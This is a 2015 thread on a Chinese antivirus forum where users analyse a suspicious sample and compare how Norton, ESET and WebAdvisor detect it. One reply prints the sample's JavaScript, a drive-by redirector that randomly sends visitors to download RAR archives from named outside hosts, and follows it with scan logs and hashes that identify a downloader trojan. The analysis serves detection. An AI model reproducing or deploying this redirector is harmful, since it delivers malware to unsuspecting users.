楼主: 水墨静音
收起左侧

[可疑文件] 可疑病毒样本

[复制链接]
z2009
发表于 2015-9-30 19:26:01 | 显示全部楼层
eam,扫描怎么不报啊
学雷锋做人
头像被屏蔽
发表于 2015-9-30 19:35:36 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
songwanyu
发表于 2015-9-30 20:05:22 | 显示全部楼层
Renascence 发表于 2015-9-30 17:54
诺顿文件信誉良好,沙盘内双击后无异常现象

我这里诺顿报了啊 是不是你启发是默认呢?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
尘梦幽然
发表于 2015-9-30 20:25:27 | 显示全部楼层
songwanyu 发表于 2015-9-30 20:05
我这里诺顿报了啊 是不是你启发是默认呢?

与启发无关,要么他病毒定义没有更新到最新,要么这几个小时才响应入库的。
songwanyu
发表于 2015-9-30 20:26:04 | 显示全部楼层
尘梦幽然 发表于 2015-9-30 20:25
与启发无关,要么他病毒定义没有更新到最新,要么这几个小时才响应入库的。

额  好吧 , 那估计是入库了
o0net315
发表于 2015-9-30 20:41:12 | 显示全部楼层
Renascence 发表于 2015-9-30 17:54
诺顿文件信誉良好,沙盘内双击后无异常现象

诺顿解压直接就杀了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Flying_Bird
发表于 2015-9-30 21:48:13 | 显示全部楼层
本帖最后由 Flying_Bird 于 2015-9-30 21:54 编辑


[mw_shl_code=html,true]
<html><head><script type="text/javascript" charset="utf-8">
var urla="http://www.kan258.com/gx.rar";
var urlb="http://www.kan258.com/gs.rar";
var urlc="http://www.kan258.com/gk.rar";
var urld="http://www.kan258.com/gg.rar";
var urle="http://www.7klm.com/wm.php";

var i = parseInt(Math.random()*10);
if(i == 0){
        window.location.href=urla;
}else if(i == 1){
        window.location.href=urlb;
}else if(i == 2){
        window.location.href=urlb;
}else if(i == 3){
        window.location.href=urlb;
}else if(i == 4){
        window.location.href=urlc;
}else if(i == 5){
        window.location.href=urlc;
}else if(i == 6){
        window.location.href=urla;
}else if(i == 7){
        window.location.href=urlb;
}else if(i == 8){
        window.location.href=urla;
}else if(i == 9){
      window.location.href=urla;
}
</script></head></html>[/mw_shl_code]
点击链接可以随机下载到gs.rar, gk.rar, gx.rar,而urld和urle是冗余的。
[mw_shl_code=xml,true]正在扫描日志
病毒库版本: 12334 (20150930)
日期: 2015/9/30  时间: 21:44:47
已扫描的磁盘、文件夹和文件: \gx;\gk;\gs
\gx\MM-liao9786.exe - Win32/Downloader.Agent.AL 潜在的不受欢迎应用程序 的变种
\gs\MM-liao9723.exe - Win32/Downloader.Agent.AL 潜在的不受欢迎应用程序 的变种
已扫描的对象数: 17
发现的威胁数: 2
已清除对象数: 0
完成时间: 21:44:47  总扫描时间: 0 秒 (00:00:00)[/mw_shl_code]

另外gs和gx是一样的。
[mw_shl_code=xml,true]文件: \gs\MM-liao9723.exe
大小: 917568 字节
文件版本: 1, 0, 0, 1
修改时间: 2015年9月9日, 11:28:01
MD5: 26C9871FE8541E68DF2B412884FDD3E4
SHA1: A32539B372E076345E7AC421F735A290EC08EA04
CRC32: 8D81C2AB

文件: \gx\MM-liao9786.exe
大小: 917568 字节
文件版本: 1, 0, 0, 1
修改时间: 2015年9月9日, 11:23:37
MD5: 26C9871FE8541E68DF2B412884FDD3E4
SHA1: A32539B372E076345E7AC421F735A290EC08EA04
CRC32: 8D81C2AB

文件: \gk\lingxiu_68_10644_pure.exe
大小: 446760 字节
文件版本: 1.0.0.1
修改时间: 2015年8月30日, 11:33:18
MD5: 73BF03DC78F196855E9B228A4ACA3E13
SHA1: 433343FC5E6C56BF8803DA501907660B4E6E7FED
CRC32: 97AE776D[/mw_shl_code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Flying_Bird
发表于 2015-9-30 21:52:35 | 显示全部楼层
songwanyu 发表于 2015-9-30 20:05
我这里诺顿报了啊 是不是你启发是默认呢?

应该是你们下载的文件不同,见17楼
欧阳宣
头像被屏蔽
发表于 2015-10-1 09:54:52 | 显示全部楼层
webadvisor拦截网页和压缩包

手动放行,

样本本身miss
bbszy
发表于 2015-10-1 10:14:04 来自手机 | 显示全部楼层
欧阳宣 发表于 2015-10-1 09:54
webadvisor拦截网页和压缩包

手动放行,

webadvisor在chrome firefox上还是只能给提示 不能拦截下载啊。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-21 05:08 , Processed in 0.087535 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表